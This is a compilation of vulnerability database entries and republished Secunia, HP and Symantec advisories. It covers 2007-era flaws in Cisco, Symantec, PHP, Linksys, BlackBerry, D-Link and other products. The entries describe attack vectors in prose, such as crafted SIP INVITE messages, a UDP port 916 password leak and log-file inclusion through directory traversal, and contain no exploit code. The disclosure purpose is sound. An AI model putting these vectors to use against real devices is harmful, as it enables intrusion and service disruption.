VARIoT IoT vulnerabilities database

Cisco Secure ACS does not require authentication when Cisco Trust Agent (CTA) transmits posture information, which might allow remote attackers to gain network access via a spoofed Network Endpoint Assessment posture, aka "NACATTACK." NOTE: this attack might be limited to authenticated users and devices. Cisco Secure ACS is prone to a remote security vulnerability. Also known as \"NACATTACK\"

SPBBCDrv.sys in Symantec Norton Personal Firewall 2006 9.1.0.33 and 9.1.1.7 does not validate certain arguments before being passed to hooked SSDT function handlers, which allows local users to cause a denial of service (crash) or possibly execute arbitrary code via crafted arguments to the (1) NtCreateMutant and (2) NtOpenEvent functions. NOTE: it was later reported that Norton Internet Security 2008 15.0.0.60, and possibly other versions back to 2006, are also affected. Multiple Symantec products are prone to a local denial-of-service vulnerability. This issue occurs when attackers supply invalid argument values to the 'SPBBCDrv.sys' driver. A local attacker may exploit this issue to crash affected computers, denying service to legitimate users. Symantec Norton Personal Firewall is a very popular firewall software. There is a loophole in the driver implementation of Norton Personal Firewall, and local attackers may use this loophole to perform denial-of-service attacks on the system. The vulnerability is caused due to an input validation error in SPBBCDrv.sys when handling parameters of certain hooked functions. This can be exploited to crash the system by calling NtCreateMutant or NtOpenEvent with specially crafted parameters. The vulnerability is confirmed in version 9.0.0.73 and also reported in versions 9.1.1.7 and 9.1.0.33. Other versions may also be affected. SOLUTION: Restrict access to trusted users only. PROVIDED AND/OR DISCOVERED BY: Matousec Transparent Security ORIGINAL ADVISORY: Matousec Transparent Security: http://www.matousec.com/info/advisories/Norton-Multiple-insufficient-argument-validation-of-hooked-SSDT-functions.php ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

SQL injection vulnerability in Hitachi Collaboration - Online Community Management 01-00 through 01-30, as used in Groupmax Collaboration Portal, Groupmax Collaboration Web Client, uCosminexus Collaboration Portal, Cosminexus Collaboration Portal, and uCosminexus Content Manager, allows remote attackers to execute arbitrary SQL commands via unspecified vectors. Multiple Hitachi products are prone to an SQL-injection vulnerability because the applications fail to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Please see the vendor's advisory for a list of affected products and versions. SOLUTION: Please see the vendor's advisory for fix information. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: Hitachi: http://www.hitachi-support.com/security_e/vuls_e/HS07-008_e/index-e.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple integer signedness errors in the printf function family in PHP 4 before 4.4.5 and PHP 5 before 5.2.1 on 64 bit machines allow context-dependent attackers to execute arbitrary code via (1) certain negative argument numbers that arise in the php_formatted_print function because of 64 to 32 bit truncation, and bypass a check for the maximum allowable value; and (2) a width and precision of -1, which make it possible for the php_sprintf_appendstring function to place an internal buffer at an arbitrary memory location. PHP is prone to multiple format-string vulnerabilities due to a design error when casting 64-bit variables to 32 bits. Attackers may be able to exploit these issues to execute arbitrary code in the context of the webserver process or to cause denial-of-service conditions. These issues affect PHP versions prior to 4.4.5 and 5.2.1 running on 64-bit computers. An attacker who plays by ear can execute arbitrary code with the help of specific negative parameter numbers. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01086137 Version: 1 HPSBTU02232 SSRT071429 rev.1 - Secure Web Server for HP Tru64 UNIX Powered by Apache (SWS) or HP Internet Express for Tru64 UNIX running PHP, Remote Arbitrary Code Execution, Unauthorized Disclosure of Information, or Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-06-25 Last Updated: 2007-06-25 Potential Security Impact: Remote Arbitrary Code Execution, Unauthorized Disclosure of Information, or Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential vulnerabilities have been reported on the PHP Hypertext Processing Engine provided with the Secure Web Server for HP Tru64 UNIX Powered by Apache (SWS) and HP Internet Express for Tru64 UNIX (IX). References: CVE-2006-4625 CVE-2007-0988 CVE-2007-1286 CVE-2007-1380 CVE-2007-1700 CVE-2007-1701 CVE-2007-1710 CVE-2007-1835 CVE-2007-1884 CVE-2007-1885 CVE-2007-1886 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The following supported software versions running running PHP Hypertext Processing Engine v 4.4.4 are affected: HP Internet Express for Tru64 UNIX (IX) v 6.6 and earlier Secure Web Server for HP Tru64 UNIX Powered by Apache (SWS) v 6.6.4 and earlier BACKGROUND RESOLUTION HP is providing PHP v 4.4.6 as part of Secure Web Server for HP Tru64 UNIX Powered by Apache (SWS) v 6.6.5, which resolves the potential vulnerabilities. Until the update is available in the mainstream product release, HP is releasing the following two setld-based kits publicly for use by any customer. The resolutions contained in the kits are targeted for availability in the following mainstream product release: HP Internet Express for Tru64 UNIX v 6.7 The kits distribute the following: Secure Web Server for HP Tru64 UNIX Powered by Apache (SWS) with PHP v 4.4.6 installable kit Secure Web Server for HP Tru64 UNIX Powered by Apache (SWS) with PHP v 4.4.6 installable kit and source files Secure Web Server for HP Tru64 UNIX v 6.6.5 PREREQUISITE: HP Tru64 UNIX v 5.1A or later Name: sws_v6_6_5_kit.tar.gz Location: http://h30097.www3.hp.com/internet/download.htm#sws Secure Web Server for HP Tru64 UNIX v 6.6.5 including Source Files PREREQUISITE: HP Tru64 UNIX v 5.1A or later Name: sws_v6_6_5_src_kit.tar.gz Location: http://h30097.www3.hp.com/internet/download.htm#sws PRODUCT SPECIFIC INFORMATION HISTORY Version:1 (rev.1) - 25 June 2007 Initial release Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." \xa9Copyright 2007 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 iQA/AwUBRoETyuAfOvwtKn1ZEQKROACggBC5RrNrpby62nQmYPEBLnLT8LoAoOKr X4BXLpHPsJJL+xua0KFkk+Te =oBJf -----END PGP SIGNATURE-----

The Skinny Call Control Protocol (SCCP) implementation in Cisco Unified CallManager (CUCM) 3.3 before 3.3(5)SR2a, 4.1 before 4.1(3)SR4, 4.2 before 4.2(3)SR1, and 5.0 before 5.0(4a)SU1 allows remote attackers to cause a denial of service (loss of voice services) by sending crafted packets to the (1) SCCP (2000/tcp) or (2) SCCPS (2443/tcp) port. Cisco Unified CallManager (CUCM) and Cisco Unified Presence Server (CUPS) are prone to multiple remote denial-of-service vulnerabilities. These issues occur because the devices fail to handle certain network packets or network requests. An attacker can exploit these issues to crash the affected services on the devices, denying service to legitimate users. This vulnerability is documented in Cisco Bug ID as CSCsf10805

Cisco Unified CallManager (CUCM) 5.0 before 5.0(4a)SU1 and Cisco Unified Presence Server (CUPS) 1.0 before 1.0(3) allow remote attackers to cause a denial of service (loss of voice services) via a flood of ICMP echo requests, aka bug ID CSCsf12698. These issues occur because the devices fail to handle certain network packets or network requests. An attacker can exploit these issues to crash the affected services on the devices, denying service to legitimate users. The CUCM vulnerability is documented in Cisco Bug ID as CSCsf12698 and the CUPS vulnerability is documented in Cisco Bug ID as CSCsg60930

Unspecified vulnerability in the IPSec Manager Service for Cisco Unified CallManager (CUCM) 5.0 before 5.0(4a)SU1 and Cisco Unified Presence Server (CUPS) 1.0 before 1.0(3) allows remote attackers to cause a denial of service (loss of cluster services) via a "specific UDP packet" to UDP port 8500, aka bug ID CSCsg60949. Cisco Unified CallManager (CUCM) and Cisco Unified Presence Server (CUPS) are prone to multiple remote denial-of-service vulnerabilities. These issues occur because the devices fail to handle certain network packets or network requests. An attacker can exploit these issues to crash the affected services on the devices, denying service to legitimate users. The CUCM vulnerability is documented in Cisco Bug ID as CSCsg20143 and the CUPS vulnerability is documented in Cisco Bug ID as CSCsg60949

The Remote Play feature in Sony Playstation 3 (PS3) 1.60 and Playstation Portable (PSP) 3.10 OE-A allows remote attackers to cause a denial of service via a flood of UDP packets. PSP is prone to a denial-of-service vulnerability

The D-Link DPH-540/DPH-541 phone accepts SIP INVITE messages that are not from the Call Server's IP address, which allows remote attackers to engage in arbitrary SIP communication with the phone, as demonstrated by communication with forged caller ID. D-Link DPH-540 / DPH-541 are popular wireless internet phone handsets.  There are vulnerabilities in DPH-540 / DPH-541 mobile phones when processing authentication of data requests. Remote attackers may use this vulnerability to send malicious messages to the device. An attacker can exploit this issue to bypass security restrictions

The Research in Motion BlackBerry 7270 with 4.0 SP1 Bundle 83 allows remote attackers to cause a denial of service (blocked call reception) via a malformed SIP invite message, possibly related to multiple format string specifiers in the From field, a spoofed source IP address, and limitations of the function stack frame. BlackBerry 7270 phone is prone to a remote format-string vulnerability. An attacker can exploit this issue to cause certain features of the phone to become unusable until the phone has been reset. BlackBerry 7270 with BlackBerry Device Software 4.0.1.83 and earlier versions are vulnerable. NOTE: When exploited, the device may generate the following error message: "Uncaught exception: java.lang.IllegalArgumentException"

The Research in Motion BlackBerry 7270 before 4.0 SP1 Bundle 108 does not properly manage transaction states, which allows remote attackers to cause a denial of service (temporary device hang) by sending a certain SIP INVITE message, but not providing an ACK when the call is answered. BlackBerry 7270 is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause certain features of the phone to become unusable until the phone has been reset. NOTE: The denial-of-service conditions will remain even when the phone re-registers with the Registrar. BlackBerry 7270 with BlackBerry Device Software 4.0.1.83 and prior versions are vulnerable

The D-Link DPH-540/DPH-541 phone allows remote attackers to cause a denial of service (device outage) via a malformed SDP header in a SIP INVITE message. D-Link DPH-540/DPH-541 Wi-Fi phone is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause certain features of the phone to become unusable until the phone has been reset. A denial of service vulnerability exists in the D-Link DPH-540/DPH-541 Wi-Fi Phones SDP Header

Stack-based buffer overflow in the dns_decode_reverse_name function in dns_decode.c in dproxy-nexgen allows remote attackers to execute arbitrary code by sending a crafted packet to port 53/udp, a different issue than CVE-2007-1465. dproxy-nexgen of dns_decode.c of dns_decode_reverse_name The function contains a stack-based buffer overflow vulnerability. Dproxy is a small cached DNS server. Dproxy is prone to a remote buffer-overflow vulnerability because it fails to properly check boundaries on user-supplied data before copying it to an insufficiently sized buffer. Exploiting this issue could lead to denial-of-service conditions and to the execution of arbitrary machine code with superuser privileges. A successful attack could result in the complete compromise of affected computers or routers/devices. Version 1.c is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Secunia customers receive relevant and filtered advisories. Delivery is done via different channels including SMS, Email, Web, and https based XML feed. http://corporate.secunia.com/trial/38/request/ ---------------------------------------------------------------------- TITLE: dproxy-nexgen "dns_decode_reverse_name" Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA24688 VERIFY ADVISORY: http://secunia.com/advisories/24688/ CRITICAL: Moderately critical IMPACT: System access WHERE: >From local network SOFTWARE: dproxy-nexgen http://secunia.com/product/13834/ DESCRIPTION: mu-b has discovered a vulnerability in dproxy-nexgen, which can be exploited by malicious people to compromise a vulnerable system. Successful exploitation allows execution of arbitrary code. The vulnerability is confirmed in the latest available version (2007-04-02). SOLUTION: Use the software only in a trusted network environment. PROVIDED AND/OR DISCOVERED BY: mu-b ORIGINAL ADVISORY: http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/053289.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in ManageEngine Firewall Analyzer allows remote authenticated users to "access any common file" via a direct URL request. ManageEngine Firewall Analyzer is prone to a remote information-disclosure vulnerability. A remote authenticated attacker can leverage this issue to access sensitive data. Information obtained could aid in further attacks. ---------------------------------------------------------------------- Want a new job? http://secunia.com/secunia_vacancies/ Secunia is looking for new researchers with a reversing background and experience in writing exploit code: http://secunia.com/hardcore_disassembler_and_reverse_engineer/ http://secunia.com/Disassembling_og_Reversing/ http://secunia.com/Linux_Security_Specialist/ ---------------------------------------------------------------------- TITLE: ManageEngine Firewall Analyzer Information Disclosure SECUNIA ADVISORY ID: SA24707 VERIFY ADVISORY: http://secunia.com/advisories/24707/ CRITICAL: Less critical IMPACT: Exposure of sensitive information WHERE: >From remote SOFTWARE: ManageEngine Firewall Analyzer 4.x http://secunia.com/product/13811/ DESCRIPTION: yearsilent has reported a security issue in ManageEngine Firewall Analyzer, which can be exploited by malicious users to disclose potentially sensitive information. SOLUTION: Reportedly, the vulnerability will be fixed in build 4030. Please contact the vendor for early access to this build version. PROVIDED AND/OR DISCOVERED BY: yearsilent ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php. GeBlog of index.php Contains a directory traversal vulnerability.By a third party .. GeBlog is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to access sensitive information and to execute local script code in the context of the application; this may facilitate other attacks against the affected computer. GeBlog 0.1 is vulnerable; other versions may also be affected

Unspecified vulnerability in the Cisco IP Phone 7940 and 7960 running firmware before POS8-6-0 allows remote attackers to cause a denial of service via the Remote-Party-ID sipURI field in a SIP INVITE request. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. Cisco 7940/7960 phones are prone to a remote denial-of-service vulnerability. Cisco IP Phone is a system for providing voice communication over IP network. The vulnerability is caused due to an error within the handling of certain SIP INVITE messages. This can be exploited to reboot the device by sending a specially crafted INVITE message with a malformed "sipURI" field of the Remote-Party-ID. The vulnerability is reported in devices running firmware POS3-07-4-00. SOLUTION: Reportedly, firmware POS8-6-0 is unaffected. PROVIDED AND/OR DISCOVERED BY: Humberto J. Abdelnur, Radu State, and Olivier Festor ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Linksys WAG200G with firmware 1.01.01, WRT54GC 2 with firmware 1.00.7, and WRT54GC 1 with firmware 1.03.0 and earlier allow remote attackers to obtain sensitive information (passwords and configuration data) via a packet to UDP port 916. NOTE: some of these details are obtained from third party information. Linksys WAG200G is prone to a vulnerability that may disclose sensitive information. An attacker can exploit this issue to retrieve sensitive information that may aid in further attacks. This issue affects firmware version 1.01.01; other versions may also be vulnerable. Linksys WAG200G is a wireless ADSL router. ---------------------------------------------------------------------- Want a new job? http://secunia.com/secunia_vacancies/ Secunia is looking for new researchers with a reversing background and experience in writing exploit code: http://secunia.com/hardcore_disassembler_and_reverse_engineer/ http://secunia.com/Disassembling_og_Reversing/ http://secunia.com/Linux_Security_Specialist/ ---------------------------------------------------------------------- TITLE: Linksys Products Information Disclosure Security Issue SECUNIA ADVISORY ID: SA24658 VERIFY ADVISORY: http://secunia.com/advisories/24658/ CRITICAL: Moderately critical IMPACT: Exposure of system information, Exposure of sensitive information WHERE: >From local network OPERATING SYSTEM: Linksys WAG200G http://secunia.com/product/13810/ Linksys WRT54GC http://secunia.com/product/13808/ DESCRIPTION: A security issue has been reported in various Linksys products, which can be exploited to disclose certain sensitive information. the product model, the web interface password, the PPPoA username, the PPPoA password, the SSID, and the WPA passphrase by sending a UDP packet to port 916 of the device. The security issue is reported in WAG200G with firmware 1.01.03 and earlier, WRT54GC v1 with firmware 1.03.0 and earlier, and WRT54GC v2 with firmware 1.00.7 and earlier. PROVIDED AND/OR DISCOVERED BY: Daniel Niggebrugge, additional information by Bartomiej Ochman ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Format string vulnerability in F-Secure Anti-Virus Client Security 6.02 allows local users to cause a denial of service and possibly gain privileges via format string specifiers in the Management Server name field on the Communication settings page. F-Secure Anti-Virus Client Security is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input before using it in the format-specifier argument to a formatted-printing function. Successfully exploiting this vulnerability may allow an attacker to access sensitive process memory or to crash the application. Code execution may potentially be possible, but this has not been confirmed. F-Secure Anti-Virus Client Security is a real-time virus monitoring and protection system on the PC platform, supporting all WINDOWS systems

Multiple cross-site scripting (XSS) vulnerabilities in (1) PreSearch.html and (2) PreSearch.class in Cisco Secure Access Control Server (ACS), VPN Client, Unified Personal Communicator, MeetingPlace, Unified MeetingPlace, Unified MeetingPlace Express, CallManager, IP Communicator, Unified Video Advantage, Unified Videoconferencing 35xx products, Unified Videoconferencing Manager, WAN Manager, Security Device Manager, Network Analysis Module (NAM), CiscoWorks and related products, Wireless LAN Solution Engine (WLSE), 2006 Wireless LAN Controllers (WLC), and Wireless Control System (WCS) allow remote attackers to inject arbitrary web script or HTML via the text field of the search form. Multiple Cisco products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. An attacker may leverage this issue by enticing a victim into following a maliciously crafted URI. Attackers may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco IDs: CSCsh91761, CSCsh52300, CSCsh91884, CSCsi12435, CSCsh91901, CSCsi10405, CSCsh91953, CSCsh93070, CSCsh93854, CSCek71039, CSCsh95009, CSCsi10818, CSCsi10674, CSCsi10982, CSCsi13743, CSCsi13763. A remote attacker can inject arbitrary web script or HTML with the help of a text field in search format. Input passed to the search code of PreSearch.html or PreSearch.class (depending on software or device) is not properly sanitised before being returned to the user. SOLUTION: If possible, the vendor recommends deleting or renaming the PreSearch.html and PreSearch.class files. PROVIDED AND/OR DISCOVERED BY: Independently discovered by Erwin Paternotte from Fox-IT and Cassio Goldschmidt. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sr-20070315-xss.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The SymTDI device driver (SYMTDI.SYS) in Symantec Norton Personal Firewall 2006 9.1.1.7 and earlier, Internet Security 2005 and 2006, AntiVirus Corporate Edition 3.0.x through 10.1.x, and other Norton products, allows local users to cause a denial of service (system crash) by sending crafted data to the driver's \Device file, which triggers invalid memory access, a different vulnerability than CVE-2006-4855. Symantec 'SYMTDI.SYS' device driver is prone to a local denial-of-service vulnerability. A local authenticated attacker may exploit this issue to crash affected computers, denying service to legitimate users. This issue is similar to the one described in BID 22961. Symantec is currently investigating this issue; we will update this BID as more information emerges. Norton Personal Firewall does not adequately protect its \Device\SymEvent driver and does not validate input buffers, so a local attacker can open the driver and send arbitrary data that is considered valid. A specially crafted IRP sent to an IOCTL handler function could allow memory to be overwritten because the address space was not properly validated in some versions of the driver. A potential attacker must be logged into the computer to attempt an exploit. A successful exploit of this vulnerability could potentially allow that user to crash their computer. Symantec Response Symantec engineers have verified that the vulnerability exists in the products listed in the Affected Products section above, and have provided updates for all affected products. Consumer (Norton) products can be updated by running LiveUpdate. Symantec AntiVirus Corporate Edition customers can obtain the update from the Symantec web site. Symantec is not aware of any customers impacted by this issue, or of any attempts to exploit the issue. References This issue is a candidate for inclusion in the Common Vulnerabilities and Exposures (CVE) list (http://cve.mitre.org), which standardizes names for security problems. The CVE initiative has assigned CVE-2007-1476 to this issue. SecurityFocus has assigned BID 22977 to this vulnerability. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Symantec Product Security -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.0.6 (Build 6060) iQEVAwUBRuVg1/9Lqygkbb6BAQiy8gf/aQDO+uftL8+Ia+FLbnOuuEUzfR/LWBHn SFSBw8hk38Gq4DAGMYeBI2Am74cUxjWQ5e3NqG4sQgHD2bfjTkrcPdMabiL8JaM9 j8TaCNBxgyClAcfI79dFinbgBTg4tNMfLbcLeg31gKV64WhQ962cfiZhbURXseS9 gdQMhVEDyyalFvpFFhtWkY+XigLMFeEMeMdjC77nw4jedwgQBS0FV4IAnGn8diHN 2yEHef2I4/pUj8JxHSV2DY5FudWaAc3TbdesBi5jVA/aXg2DOwHGrq05QRG1/qbp /45TREnS+hw0w3xyGs1JbZH0vlqiWoWjwKkv+xrL46bJ7laCTVON3Q== =Cd3j -----END PGP SIGNATURE-----